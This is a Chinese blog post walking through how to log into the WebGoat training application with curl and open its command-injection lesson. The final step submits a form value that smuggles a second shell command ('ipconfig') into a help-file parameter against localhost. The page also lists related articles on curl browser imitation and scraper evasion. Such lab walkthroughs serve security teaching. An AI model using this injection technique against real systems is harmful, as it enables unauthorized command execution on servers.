curl摸拟浏览器运行WebGoat

最新推荐文章于 2025-06-08 09:03:01 发布

原创最新推荐文章于 2025-06-08 09:03:01 发布 · 727 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#浏览器 #menu #command

本文详细介绍通过curl命令登录WebGoat平台并进行命令注入攻击的步骤。文章首先讲解如何获取并保存Cookie，接着演示如何提交表单进入主页面，最后提供具体的命令注入示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

这个WebGoat有一些个性化的操作，所以记录在此

步骤：

1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack" -v

登录进入WebGoat，并保存COOKIE

2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v

提交start = Start WebGoat的表单，进入WebGoat的主页面。

此时，应该查看页面源代码中你想点的链接是什么，

如：

<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>

注意： WebGoat对不同的COOKIE，返回的页面链接并不相同，如果在后面的步骤中，你访问的是浏览器里查看到的链接，很可能那个链接就不存在，返回的是主页中的介绍信息，而不是你想访问的链接的内容。

另外，由于WebGoat是使用NTLM认证协议，所以每次curl，都得带-u "guest:guest"

3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v

这样就可以访问到你想访问的链接了。

4、如果要实现命令注入，提交如下：

curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

lvming404

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

219-6-3Google浏览器书签备份

qq_43046057的博客

06-03

3891

WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称链接添加时间 WEB漏洞测试（二）——HTML注入 & XSS攻击 - 优快云博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - 优快云博客...

从虚拟机安装linux到部署docker web应用过程

billlaw2016的博客

08-10

621

这里写自定义目录标题Linux环境下部署Docker应用Virtual Box虚拟机安装Linux环境安装Docker部署简单的web应用 Linux环境下部署Docker应用最近项目需要将原来部署在服务器迁移，统一部署到Docker环境，所以研究了下Docker相关内容，我在自己的windows10机器上从零开始学习和安装Docker以及应用。首先这是最基础的部分，分为linux虚拟机安装，Docker安装，以及最简单的web应用部署。期间也记录了一些自己踩过的坑。 Virtual Box虚拟机安装L

参与评论您还未登录，请先登录后发表或查看评论

PHP cURL模拟浏览器登录

04-26

PHP cURL实现模拟登录与采集使用方法详解教程 PDF

Curl模仿http浏览器常见命令

abc123098098的博客

02-19

235

http://blog.it580.com/81 当到处都是作弊,作弊,作弊.在curl都只被当作强力投票工具的今天.你就应该了解为什么4,6级考试为什么每年都会出现泄题了. 以下讨论的是投票作弊中curl的常用参数(身不由己).其他参数请访问curl的站点. Online: http://curl.haxx.se/docs/httpscripting.shtml Date: D...

深入解析curl-impersonate：模拟浏览器HTTP请求的终极工具

最新发布

gitblog_00940的博客

06-08

442

深入解析curl-impersonate：模拟浏览器HTTP请求的终极工具什么是curl-impersonate curl-impersonate是一个特殊的curl构建版本，它能够模拟现代浏览器发送HTTP请求的行为。与标准curl不同，这个工具可以精确模仿Chrome、Edge、Safari和Firefox等主流浏览器的最新版本在网络通信中的特征。核心价值与应用场景在当今复杂的网络环境中...

curl 模拟浏览器和X-Forward-IP

m0_37159393的博客

03-20

1367

http请求头部（header）详解-优快云博客常见的请求头部字段以下是一些常见的HTTP请求头部字段的详解：GET：此方法用于请求指定的资源。GET请求应该安全且幂等，即多次执行相同的GET请求应该产生相同的结果。POST：此方法用于向指定的资源提交数据，以便根据所提供的数据创建/更新资源。POST请求不是幂等的，每次执行相同的POST请求可能会产生不同的结果。PUT：此方法用于完整地更新指定的资源。由于PUT请求是幂等的，多次执行相同的PUT请求应该产生相同的结果。

curl模拟浏览器请求

彳亍

04-10

7906

自行封装一个curl模拟浏览器请求的函数，如下： /** * curl模拟浏览器请求 * @param unknown $url 请求的地址 * @param array $params 请求地址所需要的参数 * @param string $method 请求的类型 * @param array $headers http请求头

php curl函数应用方法之模拟浏览器

天风大陆

05-12

962

curl 是使用URL语法的传送文件工具，支持FTP、FTPS、HTTP HTPPS SCP SFTP TFTP TELNET DICT FILE和LDAP。curl 支持SSL证书、HTTP POST、HTTP PUT 、FTP 上传，kerberos、基于HTT格式的上传、代理、cookie、用户＋口令证明、文件传送恢复、http代理通道和大量其他有用的技巧。详见参考手册原来php默认并不进行

红队专题-漏洞挖掘-代码审计

aming小老弟

03-11

1246

其中 Web A 为存在 CSRF 漏洞的网站，Web B 为攻击者构建的恶意网站，User C 为 Web A 网站的合法用户。用户 C 打开浏览器，访问受信任网站 A，输入用户名和密码请求登录网站A在用户信息通过验证后，网站 A 产生 Cookie 信息并返回给浏览器，此时用户登录网站 A 成功，可以正常发送请求到网站A用户未退出网站 A 之前，在同一浏览器中，打开一个 TAB 页访问网站 B网站 B 接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点 A。

Kali Linux搭建渗透测试实验环境教程

02-21

可能用户还会遇到工具无法运行的情况，比如依赖缺失或者服务未启动。需要准备常见问题排查，比如Metasploit数据库连接失败如何处理，如何安装缺失的依赖库等。最后，要强调法律和道德规范，确保用户了解渗透测试的...

网络安全测试工具

danqingdani的专栏

04-27

996

Paros 可以捕获和篡改http请求与响应的内容 Trap request可以修改http请求的内容，再发送给服务器 Trap response可以修改http响应的内容，再发送给浏览器 将用户输入的文字进行URL编码或解码 MaxPatrol Nessus NetInfo 网络常用命令工具 Firefox扩展 ①　Firebug var test_elemen

模拟请求curl工具

07-13

windows64的curl7命令发送请求调试工具，cmd启动文件夹中的bin/curl.exe命令，行执行请求（具体操作请百度）

curl 模拟浏览器头和refer及Curl模仿http浏览器常见命令

xiaoxuan2015

02-20

6938

linux下shell终端curl的post数据 curl -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" -e "http://post.html" -d "2880[]=105&pid=2880&p=最佳&count=1&receipt=1&poll=投票" http://post.php 注释： -A "Mozill

curl 模仿浏览器post 访问

yang_yun_hao的博客

04-12

2659

//仿post访问 //声明语言 header('content-type:text/html;charset=utf-8'); //传值三个参数访问路径数值方式 function curlPost($url,$data,$method){ $ch = curl_i

PHP使用curl模拟浏览器访问

美奇软件开发工作室

04-27

3376

/** * get请求 * @param $url */ function curl_get($url,$gzip=false,$firefox=false) { if($firefox) { //火狐浏览器 $useragent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0'; } else { //谷歌浏览器 $useragent = 'Mozilla/5.0 .

Curl Get和Post模拟浏览器请求

ztianming的博客

07-27

1069

1, Curl POST 请求 /** * post方式发送curl请求 * @param string $url 请求的服务器地址 * @param array $data 要发送的数据 * @param array $header 请求头数据 * @param int $timeout 超时时间 * @return mixed * @author itbsl */ function cur...

php curl模拟 浏览器 伪装客户端访问真实可用

qq_22385935的博客

09-27

8444

作者最近有个需求，爬取别人的网站的卡的归属银行，发现这个接口挺好用，就想了个办法模拟访问获取 public function getUrlContent() { $origin = 'http://www.lianhanghao.com'; //目标网址 $referer = $origin . "/cardbin.html";//当前页面 ...

新手教学系列——MacOS 10.13.6下如何使用curl_cffi模拟Chrome请求

weixin_41701856的博客

09-29

1547

curl_cffi是一个基于C语言的libcurl库的Python封装，其特别之处在于它底层依赖了。是一个针对绕过反爬虫机制的工具，通过模仿真实浏览器请求，可以最大程度地避免被服务器检测到。与我们熟悉的requests或aiohttp库相比，curl_cffi不仅支持同步和异步的请求，还能精确地模拟浏览器（尤其是Chrome）的行为，这使它在绕过复杂的防爬虫系统时有明显优势。通过本文的介绍，你应该能够在MacOS 10.13.6下顺利安装并使用curl_cffi。尽管安装过程涉及手动编译。

使用curl模拟服务器http请求

enjoy.day

03-08

1543

curl 实践

浏览器怎么运行curl

02-26

### 浏览器中的Curl命令执行大多数现代浏览器并不直接支持在开发者控制台中运行`curl`命令。然而，可以通过JavaScript的`fetch` API 或者 `XMLHttpRequest` 来实现类似的HTTP请求功能[^2]。对于希望模仿`curl`行为的情况，在浏览器环境中通常会采用如下方式： #### 使用 Fetch API 发送 GET 请求 ```javascript fetch('https://www.example.com') .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` #### 模拟带有Cookie的GET请求 (类似于 curl -b) 为了携带Cookies，可以设置credentials模式为`include`: ```javascript fetch('https://www.cookiesite.com', { credentials: 'include' }) .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` #### 执行 POST 请求并提交表单数据当需要模拟登录或者其他形式的数据提交时，可构建POST请求： ```javascript const formData = new FormData(); formData.append('username', 'your_username'); formData.append('password', 'your_password'); fetch('http://example.com/wp-login.php', { method: 'POST', body: formData, credentials: 'include' // 如果目标站点期望接收cookie }).then(response => response.json()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` 值得注意的是，由于同源策略(Same-Origin Policy)的存在，跨域请求可能会受到限制除非服务器端配置了合适的 CORS 头信息允许此类操作[^3]。